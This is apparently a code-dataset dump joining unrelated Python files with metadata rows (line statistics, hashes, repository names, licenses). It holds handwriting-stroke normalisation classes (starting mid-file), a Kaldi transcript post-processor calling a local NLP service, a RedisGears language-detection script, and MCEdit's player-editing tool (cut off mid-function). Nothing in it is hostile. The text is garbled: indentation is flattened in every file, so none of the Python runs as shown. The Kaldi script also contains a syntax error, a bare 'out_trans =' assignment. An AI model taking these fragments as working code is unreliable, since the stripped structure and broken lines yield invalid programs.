seqs_in_pad = list(seq_in)
while len(seqs_in_pad) <= 2 * len(seq_out) + 1:
n = len(seqs_in_pad[0])
seqs_in_pad.append([self._padding] * n)
yield seqs_in_pad, seq_out
class Normalizer:
def __init__(self):
self._mu = None
self._sd = None
@staticmethod
def from_json(path):
with open(path, 'r') as f:
s = f.read()
d = json.loads(s)
normalizer = Normalizer()
mu = np.array(d['mu'])
sd = np.array(d['sd'])
normalizer.set_mean(mu)
normalizer.set_deviation(sd)
return normalizer
def to_json(self, path):
d = {
'mu': np.array(self.mu).tolist(),
'sd': np.array(self.sd).tolist()
}
with open(path, 'w') as f:
f.write(json.dumps(d))
def set_mean(self, mu):
self._mu = mu
def set_deviation(self, sd):
self._sd = sd
@property
def mu(self):
return self._mu
@property
def sd(self):
return self._sd
def fit(self, X):
sequence = []
for x in X:
sequence.extend(x)
self._mu = np.mean(sequence, axis=0)
self._sd = np.std(sequence, axis=0)
def preprocess(self, X):
res = []
for x in X:
x_norm = (x - self._mu) / self._sd
# we do not want to normalize END-OF-STROKE flag which is last in the tuple
x_norm[:, -1] = np.array(x)[:, -1]
res.append(x_norm.tolist())
return res
class OffsetPointsSource(BaseSource):
def __init__(self, source):
self._source = source
def __len__(self):
return len(self._source)
def get_sequences(self):
for strokes, transcription in self._source.get_sequences():
x0, y0, t0 = strokes[0].points[0]
new_seq = []
for stroke in strokes:
points = []
for x, y, t in stroke.points:
points.append((x - x0, y - y0, t - t0, 0))
points[-1] = points[-1][:-1] + (1,)
new_seq.extend(points)
yield new_seq, transcription
class NormalizedSource(BaseSource):
def __init__(self, source, normalizer):
self._source = source
self._normalizer = normalizer
def __len__(self):
return len(self._source)
def get_sequences(self):
for points, transcription in self._source.get_sequences():
norm = self._normalizer.preprocess([points])[0]
yield norm, transcription
class DenormalizedSource(BaseSource):
def __init__(self, source, normalizer):
self._source = source
self._normalizer = normalizer
def __len__(self):
return len(self._source)
def get_sequences(self):
mu = self._normalizer.mu
sd = self._normalizer.sd
for points, transcription in self._source.get_sequences():
denormalized = [(p * sd + mu).tolist() for p in points]
for i, p in enumerate(denormalized):
p[3] = points[i][3]
yield denormalized, transcription
class H5pySource(BaseSource):
def __init__(self, h5py_ds, random_order=True):
self._h5py = h5py_ds
self._random = random_order
def __len__(self):
return len(self._h5py)
def get_sequences(self):
return self._h5py.get_data(random_order=self._random)
class PreprocessedSource(BaseSourceWrapper):
def __init__(self, source, preprocessor):
super().__init__(source)
self._preprocessor = preprocessor
def get_sequences(self):
for xs, ys in self._source.get_sequences():
yield self._preprocessor.pre_process_example(xs, ys)
class ConstrainedSource(BaseSourceWrapper):
def __init__(self, source, num_lines):
super().__init__(source)
self._num_lines = num_lines
self._use_all = (num_lines == 0)
def get_sequences(self):
for j, (seq_in, seq_out) in enumerate(self._source.get_sequences()):
#print(j, seq_out)
if j % 500 == 0:
print('Fetched {} examples'.format(j))
if j >= self._num_lines and not self._use_all:
break
yield seq_in, seq_out
class PlainListSource(BaseSourceWrapper):
def get_sequences(self):
for strokes, t in self._source.get_sequences():
points = [stroke.points for stroke in strokes]
yield points, t
| 26.038136 | 87 | 0.588771 | 757 | 6,145 | 4.498018 | 0.198151 | 0.085169 | 0.032305 | 0.0558 | 0.314244 | 0.247577 | 0.208517 | 0.200587 | 0.174449 | 0.174449 | 0 | 0.008201 | 0.305452 | 6,145 | 235 | 88 | 26.148936 | 0.789597 | 0.014646 | 0 | 0.284848 | 0 | 0 | 0.00694 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.224242 | false | 0 | 0.030303 | 0.060606 | 0.406061 | 0.006061 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
91487dc34ce39dcba03a9475df5437871d95ebe4 | 2,546 | py | Python | sample_full_post_processor.py | huynguyen82/Modified-Kaldi-GStream-OnlineServer | e7429a5e44b9567b603523c0046fb42d8503a275 | [
"BSD-2-Clause"
] | null | null | null | sample_full_post_processor.py | huynguyen82/Modified-Kaldi-GStream-OnlineServer | e7429a5e44b9567b603523c0046fb42d8503a275 | [
"BSD-2-Clause"
] | 1 | 2021-03-25T23:17:23.000Z | 2021-03-25T23:17:23.000Z | sample_full_post_processor.py | huynguyen82/Modified-Kaldi-GStream-OnlineServer | e7429a5e44b9567b603523c0046fb42d8503a275 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python
import sys
import json
import logging
from math import exp
import requests as rq
import re
### For NLP post-processing
header={"Content-Type": "application/json"}
message='{"sample":"Hello bigdata"}'
api_url="http://192.168.1.197:11992/norm"
###
def NLP_process_output(pre_str):
try:
jmsg=json.loads(message)
jmsg['sample']=pre_str
r = rq.post(api_url,json=jmsg, headers=header)
results = json.loads(r.text)['result']
logging.info("NLP=%s" % results)
return results
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logging.error("Failed to get NLP post-processing: %s : %s " % (exc_type, exc_value))
return pre_str
def post_process_json(str):
try:
event = json.loads(str)
if "result" in event:
if len(event["result"]["hypotheses"]) > 1:
likelihood1 = event["result"]["hypotheses"][0]["likelihood"]
likelihood2 = event["result"]["hypotheses"][1]["likelihood"]
confidence = likelihood1 - likelihood2
confidence = 1 - exp(-confidence)
else:
confidence = 1.0e+10
event["result"]["hypotheses"][0]["confidence"] = confidence
org_trans = event["result"]["hypotheses"][0]["transcript"]
logging.info("Recognized result=%s" % org_trans )
out_trans = NLP_process_output(org_trans) + '.'
out_trans =
logging.info("Pass into funtion is %s" % out_trans)
event["result"]["hypotheses"][0]["transcript"] = out_trans
del event["result"]["hypotheses"][1:]
return json.dumps(event)
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logging.error("Failed to process JSON result: %s : %s " % (exc_type, exc_value))
return str
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG, format="%(levelname)8s %(asctime)s %(message)s ")
lines = []
while True:
l = sys.stdin.readline()
if not l: break # EOF
if l.strip() == "":
if len(lines) > 0:
result_json = post_process_json("".join(lines))
print result_json
print
sys.stdout.flush()
lines = []
else:
lines.append(l)
if len(lines) > 0:
result_json = post_process_json("".join(lines))
print result_json
lines = []
| 34.405405 | 94 | 0.565593 | 297 | 2,546 | 4.693603 | 0.363636 | 0.055237 | 0.105452 | 0.043042 | 0.262554 | 0.262554 | 0.209469 | 0.176471 | 0.176471 | 0.176471 | 0 | 0.019016 | 0.297722 | 2,546 | 73 | 95 | 34.876712 | 0.760626 | 0.018853 | 0 | 0.265625 | 0 | 0 | 0.178313 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.015625 | 0.09375 | null | null | 0.046875 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
914899652debcd6bf278b6bcd59488d3ca01a934 | 349 | py | Python | lang_detect_gears.py | AlexMikhalev/cord19redisknowledgegraph | a143415aca8d4a6db820dc7a25280045f421a665 | [
"Apache-2.0"
] | 7 | 2020-05-18T09:25:17.000Z | 2021-08-05T00:23:36.000Z | lang_detect_gears.py | maraqa1/CORD-19 | a473f7b60b8dfa476ea46505678481e4b361d04e | [
"Apache-2.0"
] | 10 | 2020-05-31T14:44:26.000Z | 2022-03-25T19:17:37.000Z | lang_detect_gears.py | maraqa1/CORD-19 | a473f7b60b8dfa476ea46505678481e4b361d04e | [
"Apache-2.0"
] | null | null | null | from langdetect import detect
def detect_language(x):
#detect language of the article
try:
lang=detect(x['value'])
except:
lang="empty"
execute('SET', 'lang_article:' + x['key'], lang)
if lang!='en':
execute('SADD','titles_to_delete', x['key'])
gb = GB()
gb.foreach(detect_language)
gb.run('title:*') | 23.266667 | 52 | 0.60745 | 47 | 349 | 4.404255 | 0.595745 | 0.202899 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.22063 | 349 | 15 | 53 | 23.266667 | 0.761029 | 0.08596 | 0 | 0 | 0 | 0 | 0.191223 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.083333 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
914c1ed0296d91a573e8d232f2ea7fec8dafd2e3 | 46,013 | py | Python | editortools/player.py | bennettdc/MCEdit-Unified | 90abfb170c65b877ac67193e717fa3a3ded635dd | [
"0BSD"
] | 237 | 2018-02-04T19:13:31.000Z | 2022-03-26T03:06:07.000Z | editortools/player.py | bennettdc/MCEdit-Unified | 90abfb170c65b877ac67193e717fa3a3ded635dd | [
"0BSD"
] | 551 | 2015-01-01T02:36:53.000Z | 2018-02-01T00:03:12.000Z | editortools/player.py | bennettdc/MCEdit-Unified | 90abfb170c65b877ac67193e717fa3a3ded635dd | [
"0BSD"
] | 97 | 2015-01-02T01:31:12.000Z | 2018-01-22T05:37:47.000Z | """Copyright (c) 2010-2012 David Rio Vierra
Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted, provided that the above
copyright notice and this permission notice appear in all copies.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE."""
#-# Modifiedby D.C.-G. for translation purpose
from OpenGL import GL
import numpy
import os
from albow import TableView, TableColumn, Label, Button, Column, CheckBox, AttrRef, Row, ask, alert, input_text_buttons, TabPanel
from albow.table_view import TableRowView
from albow.translate import _
from config import config
from editortools.editortool import EditorTool
from editortools.tooloptions import ToolOptions
from glbackground import Panel
from glutils import DisplayList
from mceutils import loadPNGTexture, alertException, drawTerrainCuttingWire, drawCube
from operation import Operation
import pymclevel
from pymclevel.box import BoundingBox, FloatBox
from pymclevel import nbt
import logging
from player_cache import PlayerCache, ThreadRS
from nbtexplorer import loadFile, saveFile, NBTExplorerToolPanel
import pygame
log = logging.getLogger(__name__)
class PlayerRemoveOperation(Operation):
undoTag = None
def __init__(self, tool, player="Player (Single Player)"):
super(PlayerRemoveOperation, self).__init__(tool.editor, tool.editor.level)
self.tool = tool
self.player = player
self.level = self.tool.editor.level
self.canUndo = False
self.playercache = PlayerCache()
def perform(self, recordUndo=True):
if self.level.saving:
alert(_("Cannot perform action while saving is taking place"))
return
if self.player == "Player (Single Player)":
answer = ask(_("Are you sure you want to delete the default player?"), ["Yes", "Cancel"])
if answer == "Cancel":
return
self.player = "Player"
if recordUndo:
self.undoTag = self.level.getPlayerTag(self.player)
self.level.players.remove(self.player)
if self.tool.panel:
if self.player != "Player":
#self.tool.panel.players.remove(player_cache.getPlayerNameFromUUID(self.player))
#self.tool.panel.players.remove(self.playercache.getPlayerInfo(self.player)[0])
str()
else:
self.tool.panel.players.remove("Player (Single Player)")
while self.tool.panel.table.index >= len(self.tool.panel.players):
self.tool.panel.table.index -= 1
#if len(self.tool.panel.players) == 0:
# self.tool.hidePanel()
# self.tool.showPanel()
self.tool.hidePanel()
self.tool.showPanel()
self.tool.markerList.invalidate()
self.tool.movingPlayer = None
pos = self.tool.revPlayerPos[self.editor.level.dimNo][self.player]
del self.tool.playerPos[self.editor.level.dimNo][pos]
if self.player != "Player":
del self.tool.playerTexture[self.player]
else:
del self.level.root_tag["Data"]["Player"]
del self.tool.revPlayerPos[self.editor.level.dimNo][self.player]
self.canUndo = True
def undo(self):
if not (self.undoTag is None):
if self.player != "Player":
self.level.playerTagCache[self.level.getPlayerPath(self.player)] = self.undoTag
else:
self.level.root_tag["Data"]["Player"] = self.undoTag
self.level.players.append(self.player)
if self.tool.panel:
#if self.player != "Player":
# self.tool.panel.players.append(self.playercache.getPlayerInfo(self.player)[0])
#else:
# self.tool.panel.players.append("Player (Single Player)")
if "[No players]" in self.tool.panel.players:
self.tool.panel.players.remove("[No players]")
self.tool.hidePanel()
self.tool.showPanel()
self.tool.markerList.invalidate()
def redo(self):
self.perform()
class PlayerAddOperation(Operation):
playerTag = None
def __init__(self, tool):
super(PlayerAddOperation, self).__init__(tool.editor, tool.editor.level)
self.tool = tool
self.level = self.tool.editor.level
self.canUndo = False
self.playercache = PlayerCache()
def perform(self, recordUndo=True):
initial = ""
allowed_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
while True:
self.player = input_text_buttons("Enter a Player Name: ", 160, initial=initial, allowed_chars=allowed_chars)
if self.player is None:
return
elif len(self.player) > 16:
alert("Name too long. Maximum name length is 16.")
initial = self.player
elif len(self.player) < 1:
alert("Name too short. Minimum name length is 1.")
initial = self.player
else:
break
# print 1
data = self.playercache.getPlayerInfo(self.player)
if "<Unknown UUID>" not in data and "Server not ready" not in data:
self.uuid = data[0]
self.player = data[1]
else:
action = ask("Could not get {}'s UUID. Please make sure that you are connected to the internet and that the player \"{}\" exists.".format(self.player, self.player), ["Enter UUID manually", "Cancel"])
if action != "Enter UUID manually":
return
self.uuid = input_text_buttons("Enter a Player UUID: ", 160)
if not self.uuid:
return
# print 2
self.player = self.playercache.getPlayerInfo(self.uuid)
if self.player == self.uuid.replace("-", ""):
if ask("UUID was not found. Continue anyways?") == "Cancel":
return
# print "PlayerAddOperation.perform::self.uuid", self.uuid
if self.uuid in self.level.players:
alert("Player already exists in this World.")
return
self.playerTag = self.newPlayer()
#if self.tool.panel:
# self.tool.panel.players.append(self.player)
if self.level.oldPlayerFolderFormat:
self.level.playerTagCache[self.level.getPlayerPath(self.player)] = self.playerTag
self.level.players.append(self.player)
#if self.tool.panel:
#self.tool.panel.player_UUID[self.player] = self.player
else:
self.level.playerTagCache[self.level.getPlayerPath(self.uuid)] = self.playerTag
self.level.players.append(self.uuid)
if self.tool.panel:
self.tool.panel.player_UUID["UUID"].append(self.uuid)
self.tool.panel.player_UUID["Name"].append(self.player)
self.tool.playerPos[self.editor.level.dimNo][(0,0,0)] = self.uuid
self.tool.revPlayerPos[self.editor.level.dimNo][self.uuid] = (0,0,0)
# print 3
r = self.playercache.getPlayerSkin(self.uuid, force_download=False)
if not isinstance(r, (str, unicode)):
# print 'r 1', r
r = r.join()
# print 'r 2', r
self.tool.playerTexture[self.uuid] = loadPNGTexture(r)
self.tool.markerList.invalidate()
self.tool.recordMove = False
self.tool.movingPlayer = self.uuid
if self.tool.panel:
self.tool.hidePanel()
self.tool.showPanel()
self.canUndo = True
self.playerTag.save(self.level.getPlayerPath(self.uuid))
self.tool.nonSavedPlayers.append(self.level.getPlayerPath(self.uuid))
self.tool.inOtherDimension[self.editor.level.dimNo].append(self.uuid)
def newPlayer(self):
playerTag = nbt.TAG_Compound()
playerTag['Air'] = nbt.TAG_Short(300)
playerTag['AttackTime'] = nbt.TAG_Short(0)
playerTag['DeathTime'] = nbt.TAG_Short(0)
playerTag['Fire'] = nbt.TAG_Short(-20)
playerTag['Health'] = nbt.TAG_Short(20)
playerTag['HurtTime'] = nbt.TAG_Short(0)
playerTag['Score'] = nbt.TAG_Int(0)
playerTag['FallDistance'] = nbt.TAG_Float(0)
playerTag['OnGround'] = nbt.TAG_Byte(0)
playerTag['Dimension'] = nbt.TAG_Int(self.editor.level.dimNo)
playerTag["Inventory"] = nbt.TAG_List()
playerTag['Motion'] = nbt.TAG_List([nbt.TAG_Double(0) for i in xrange(3)])
spawn = self.level.playerSpawnPosition()
spawnX = spawn[0]
spawnZ = spawn[2]
blocks = [self.level.blockAt(spawnX, i, spawnZ) for i in xrange(self.level.Height)]
i = self.level.Height
done = False
for index, b in enumerate(reversed(blocks)):
if b != 0 and not done:
i = index
done = True
spawnY = self.level.Height - i
playerTag['Pos'] = nbt.TAG_List([nbt.TAG_Double([spawnX, spawnY, spawnZ][i]) for i in xrange(3)])
playerTag['Rotation'] = nbt.TAG_List([nbt.TAG_Float(0), nbt.TAG_Float(0)])
return playerTag
def undo(self):
self.level.players.remove(self.uuid)
self.tool.movingPlayer = None
if self.tool.panel:
#self.tool.panel.players.remove(self.player)
self.tool.panel.player_UUID["UUID"].remove(self.uuid)
self.tool.panel.player_UUID["Name"].remove(self.player)
self.tool.hidePanel()
self.tool.showPanel()
if self.tool.movingPlayer is None:
del self.tool.playerPos[self.tool.revPlayerPos[self.uuid]]
else:
del self.tool.playerPos[(0,0,0)]
del self.tool.revPlayerPos[self.uuid]
del self.tool.playerTexture[self.uuid]
os.remove(self.level.getPlayerPath(self.uuid))
if self.level.getPlayerPath(self.uuid) in self.tool.nonSavedPlayers:
self.tool.nonSavedPlayers.remove(self.level.getPlayerPath(self.uuid))
self.tool.markerList.invalidate()
def redo(self):
if not (self.playerTag is None):
self.level.playerTagCache[self.level.getPlayerPath(self.uuid)] = self.playerTag
self.level.players.append(self.uuid)
if self.tool.panel:
#self.tool.panel.players.append(self.uuid)
#self.tool.panel.player_UUID[self.player] = self.uuid
self.tool.panel.player_UUID["UUID"].append(self.uuid)
self.tool.panel.player_UUID["Name"].append(self.player)
# print 4
r = self.playercache.getPlayerSkin(self.uuid)
if isinstance(r, (str, unicode)):
r = r.join()
self.tool.playerTexture[self.uuid] = loadPNGTexture(r)
self.tool.playerPos[(0,0,0)] = self.uuid
self.tool.revPlayerPos[self.uuid] = (0,0,0)
self.playerTag.save(self.level.getPlayerPath(self.uuid))
self.tool.nonSavedPlayers.append(self.level.getPlayerPath(self.uuid))
self.tool.markerList.invalidate()
class PlayerMoveOperation(Operation):
undoPos = None
redoPos = None
def __init__(self, tool, pos, player="Player", yp=(None, None)):
super(PlayerMoveOperation, self).__init__(tool.editor, tool.editor.level)
self.tool = tool
self.canUndo = False
self.pos = pos
self.player = player
self.yp = yp
def perform(self, recordUndo=True):
if self.level.saving:
alert(_("Cannot perform action while saving is taking place"))
return
try:
level = self.tool.editor.level
try:
self.undoPos = level.getPlayerPosition(self.player)
self.undoDim = level.getPlayerDimension(self.player)
self.undoYP = level.getPlayerOrientation(self.player)
except Exception as e:
log.info(_("Couldn't get player position! ({0!r})").format(e))
yaw, pitch = self.yp
if yaw is not None and pitch is not None:
level.setPlayerOrientation((yaw, pitch), self.player)
level.setPlayerPosition(self.pos, self.player)
level.setPlayerDimension(level.dimNo, self.player)
self.tool.playerPos[tuple(self.pos)] = self.player
self.tool.revPlayerPos[self.player] = self.pos
self.tool.markerList.invalidate()
self.canUndo = True
except pymclevel.PlayerNotFound as e:
print "Player move failed: ", e
def undo(self):
if not (self.undoPos is None):
level = self.tool.editor.level
try:
self.redoPos = level.getPlayerPosition(self.player)
self.redoDim = level.getPlayerDimension(self.player)
self.redoYP = level.getPlayerOrientation(self.player)
except Exception as e:
log.info(_("Couldn't get player position! ({0!r})").format(e))
level.setPlayerPosition(self.undoPos, self.player)
level.setPlayerDimension(self.undoDim, self.player)
level.setPlayerOrientation(self.undoYP, self.player)
self.tool.markerList.invalidate()
def redo(self):
if not (self.redoPos is None):
level = self.tool.editor.level
try:
self.undoPos = level.getPlayerPosition(self.player)
self.undoDim = level.getPlayerDimension(self.player)
self.undoYP = level.getPlayerOrientation(self.player)
except Exception as e:
log.info(_("Couldn't get player position! ({0!r})").format(e))
level.setPlayerPosition(self.redoPos, self.player)
level.setPlayerDimension(self.redoDim, self.player)
level.setPlayerOrientation(self.redoYP, self.player)
self.tool.markerList.invalidate()
@staticmethod
def bufferSize():
return 20
class SpawnPositionInvalid(Exception):
pass
def okayAt63(level, pos):
"""blocks 63 or 64 must be occupied"""
# return level.blockAt(pos[0], 63, pos[2]) != 0 or level.blockAt(pos[0], 64, pos[2]) != 0
return True
def okayAboveSpawn(level, pos):
"""3 blocks above spawn must be open"""
return not any([level.blockAt(pos[0], pos[1] + i, pos[2]) for i in xrange(1, 4)])
def positionValid(level, pos):
try:
return okayAt63(level, pos) and okayAboveSpawn(level, pos)
except EnvironmentError:
return False
class PlayerSpawnMoveOperation(Operation):
undoPos = None
redoPos = None
def __init__(self, tool, pos):
super(PlayerSpawnMoveOperation, self).__init__(tool.editor, tool.editor.level)
self.tool, self.pos = tool, pos
self.canUndo = False
def perform(self, recordUndo=True):
if self.level.saving:
alert(_("Cannot perform action while saving is taking place"))
return
level = self.tool.editor.level
'''
if isinstance(level, pymclevel.MCInfdevOldLevel):
if not positionValid(level, self.pos):
if config.spawn.spawnProtection.get():
raise SpawnPositionInvalid(
"You cannot have two air blocks at Y=63 and Y=64 in your spawn point's column. Additionally, you cannot have a solid block in the three blocks above your spawn point. It's weird, I know.")
'''
self.undoPos = level.playerSpawnPosition()
level.setPlayerSpawnPosition(self.pos)
self.tool.markerList.invalidate()
self.canUndo = True
def undo(self):
if self.undoPos is not None:
level = self.tool.editor.level
self.redoPos = level.playerSpawnPosition()
level.setPlayerSpawnPosition(self.undoPos)
self.tool.markerList.invalidate()
def redo(self):
if self.redoPos is not None:
level = self.tool.editor.level
self.undoPos = level.playerSpawnPosition()
level.setPlayerSpawnPosition(self.redoPos)
self.tool.markerList.invalidate()
class PlayerPositionPanel(Panel):
def __init__(self, tool):
Panel.__init__(self, name='Panel.PlayerPositionPanel')
self.tool = tool
self.player_UUID = {"UUID": [], "Name": []}
self.level = tool.editor.level
self.playercache = PlayerCache()
# Add this instance to PlayerCache 'targets'. PlayerCache generated processes will call
# this instance 'update_player' method when they have finished their execution.
self.playercache.add_target(self.update_player)
if hasattr(self.level, 'players'):
players = self.level.players or ["[No players]"]
if not self.level.oldPlayerFolderFormat:
for player in players:
if player != "Player" and player != "[No players]":
if len(player) > 4 and player[4] == "-":
os.rename(os.path.join(self.level.worldFolder.getFolderPath("playerdata"), player+".dat"), os.path.join(self.level.worldFolder.getFolderPath("playerdata"), player.replace("-", "", 1)+".dat"))
player = player.replace("-", "", 1)
# print 5
data = self.playercache.getPlayerInfo(player, use_old_data=True)
#self.player_UUID[data[0]] = data[1]
self.player_UUID["UUID"].append(data[0])
self.player_UUID["Name"].append(data[1])
#self.player_UUID[player] = data
if "Player" in players:
#self.player_UUID["Player (Single Player)"] = "Player"
self.player_UUID["UUID"].append("Player")
self.player_UUID["Name"].append("Player (Single Player)")
if "[No players]" not in players:
self.player_names = sorted(self.player_UUID.values(), key=lambda x: False if x == "Player (Single Player)" else x)
else:
self.player_UUID["UUID"].append("[No players]")
self.player_UUID["Name"].append("[No players]")
else:
players = ["Player (Single Player)"]
self.players = players
if 'Player' in self.player_UUID['UUID'] and 'Player (Single Player)' in self.player_UUID['Name']:
self.player_UUID['UUID'].insert(0, self.player_UUID['UUID'].pop(self.player_UUID['UUID'].index('Player')))
self.player_UUID['Name'].insert(0, self.player_UUID['Name'].pop(self.player_UUID['Name'].index('Player (Single Player)')))
self.pages = TabPanel()
tab_height = self.pages.tab_height
max_height = tab_height + self.tool.editor.mainViewport.height - self.tool.editor.toolbar.height - self.tool.editor.subwidgets[0].height - self.pages.margin * 2
#-# Uncomment the following line to have a maximum height for this panel.
# max_height = min(max_height, 500)
self.editNBTDataButton = Button("Edit NBT", action=self.editNBTData, tooltipText="Open the NBT Explorer to edit player's attributes and inventory")
addButton = Button("Add", action=self.tool.addPlayer)
removeButton = Button("Remove", action=self.tool.removePlayer)
gotoButton = Button("Goto", action=self.tool.gotoPlayer)
gotoCameraButton = Button("Goto View", action=self.tool.gotoPlayerCamera)
moveButton = Button("Move", action=self.tool.movePlayer)
moveToCameraButton = Button("Align to Camera", action=self.tool.movePlayerToCamera)
reloadSkin = Button("Reload Skins", action=self.tool.reloadSkins, tooltipText="This pulls skins from the online server, so this may take a while")
btns = [self.editNBTDataButton]
if not isinstance(self.level, pymclevel.leveldbpocket.PocketLeveldbWorld):
btns.extend([addButton, removeButton])
btns.extend([gotoButton, gotoCameraButton, moveButton, moveToCameraButton, reloadSkin])
btns = Column(btns, margin=0, spacing=2)
h = max_height - btns.height - self.pages.margin * 2 - 2 - self.font.get_linesize() * 2
col = Label('')
def close():
self.pages.show_page(col)
self.nbttree = NBTExplorerToolPanel(self.tool.editor, nbtObject={}, height=max_height, \
close_text="Go Back", no_header=True, close_action=close,
load_text=None)
self.nbttree.shrink_wrap()
self.nbtpage = Column([self.nbttree])
self.nbtpage.shrink_wrap()
self.pages.add_page("NBT Data", self.nbtpage)
self.pages.set_rect(map(lambda x:x+self.margin, self.nbttree._rect))
tableview = TableView(nrows=(h - (self.font.get_linesize() * 2.5)) / self.font.get_linesize(),
header_height=self.font.get_linesize(),
columns=[TableColumn("Player Name(s):", (self.nbttree.width - (self.margin * 3)) / 3),
TableColumn("Player UUID(s):", (self.nbttree.width - (self.margin * 3)))],
)
tableview.index = 0
tableview.num_rows = lambda: len(self.player_UUID["UUID"])
tableview.row_data = lambda i: (self.player_UUID["Name"][i],self.player_UUID["UUID"][i])
tableview.row_is_selected = lambda x: x == tableview.index
tableview.zebra_color = (0, 0, 0, 48)
def selectTableRow(i, evt):
tableview.index = i
tableview.click_row = selectTableRow
def mouse_down(e):
if e.button == 1 and e.num_clicks > 1:
self.editNBTData()
TableRowView.mouse_down(tableview.rows, e)
tableview.rows.mouse_down = mouse_down
tableview.rows.tooltipText = "Double-click or use the button below to edit the NBT Data."
self.table = tableview
col.set_parent(None)
self.col = col = Column([tableview, btns], spacing=2)
self.pages.add_page("Players", col, 0)
self.pages.shrink_wrap()
self.pages.show_page(col)
self.add(self.pages)
self.shrink_wrap()
self.max_height = max_height
def editNBTData(self):
player = self.selectedPlayer
if player == 'Player (Single Player)':
alert("Not yet implemented.\nUse the NBT Explorer to edit this player.")
elif player == '[No players]':
return
else:
player = self.level.getPlayerTag(self.selectedPlayer)
if player is not None:
self.pages.remove_page(self.nbtpage)
def close():
self.pages.show_page(self.col)
self.nbttree = NBTExplorerToolPanel(self.tool.editor, nbtObject=player, fileName=None,
savePolicy=-1, dataKeyName=None,
height=self.max_height, no_header=True, close_text="Go Back",
close_action=close, load_text=None,
copy_data=False)
self.nbtpage = Column([self.nbttree,])
self.nbtpage.shrink_wrap()
self.pages.add_page("NBT Data", self.nbtpage)
self.pages.show_page(self.nbtpage)
else:
alert(_("Unable to load player %s" % self.selectedPlayer()))
@property
def selectedPlayer(self):
if not self.level.oldPlayerFolderFormat:
player = self.players[self.table.index]
if player != "Player (Single Player)" and player != "[No players]" and player != "~local_player":
return self.player_UUID["UUID"][self.table.index]
else:
return player
else:
return self.players[self.table.index]
def key_down(self, evt):
self.dispatch_key('key_down', evt)
def dispatch_key(self, name, evt):
if not hasattr(evt, 'key'):
return
if name == "key_down":
keyname = self.root.getKey(evt)
if self.pages.current_page == self.col:
if keyname == "Up" and self.table.index > 0:
self.table.index -= 1
self.table.rows.scroll_to_item(self.table.index)
elif keyname == "Down" and self.table.index < len(self.players) - 1:
self.table.index += 1
self.table.rows.scroll_to_item(self.table.index)
elif keyname == 'Page down':
self.table.index = min(len(self.players) - 1, self.table.index + self.table.rows.num_rows())
elif keyname == 'Page up':
self.table.index = max(0, self.table.index - self.table.rows.num_rows())
elif keyname == 'Return':
if self.selectedPlayer:
self.editNBTData()
if self.table.rows.cell_to_item_no(0, 0) + self.table.rows.num_rows() -1 > self.table.index or self.table.rows.cell_to_item_no(0, 0) + self.table.rows.num_rows() -1 < self.table.index:
self.table.rows.scroll_to_item(self.table.index)
elif self.pages.current_page == self.nbtpage:
self.nbttree.dispatch_key(name, evt)
def update_player(self, data):
if isinstance(data, tuple):
if data[0] in self.player_UUID['UUID']:
idx = self.player_UUID['UUID'].index(data[0])
self.player_UUID['UUID'][idx] = data[0]
self.player_UUID['Name'][idx] = data[1]
class PlayerPositionTool(EditorTool):
surfaceBuild = True
toolIconName = "player"
tooltipText = "Players"
movingPlayer = None
recordMove = True
def reloadTextures(self):
self.charTex = loadPNGTexture('char.png')
@alertException
def addPlayer(self):
op = PlayerAddOperation(self)
self.editor.addOperation(op)
if op.canUndo:
self.editor.addUnsavedEdit()
@alertException
def removePlayer(self):
player = self.panel.selectedPlayer
if player != "[No players]":
op = PlayerRemoveOperation(self, player)
self.editor.addOperation(op)
if op.canUndo:
self.editor.addUnsavedEdit()
@alertException
def movePlayer(self):
if self.panel.selectedPlayer != "[No players]":
self.movingPlayer = self.panel.selectedPlayer
if self.movingPlayer == "Player (Single Player)":
self.movingPlayer = "Player"
@alertException
def movePlayerToCamera(self):
player = self.panel.selectedPlayer
if player == "Player (Single Player)":
player = "Player"
if player != "[No players]":
pos = self.editor.mainViewport.cameraPosition
y = self.editor.mainViewport.yaw
p = self.editor.mainViewport.pitch
op = PlayerMoveOperation(self, pos, player, (y, p))
self.movingPlayer = None
self.editor.addOperation(op)
if op.canUndo:
self.editor.addUnsavedEdit()
def delete_skin(self, uuid):
del self.playerTexture[uuid]
self.playerTexture[uuid] = self.charTex
@alertException
def reloadSkins(self):
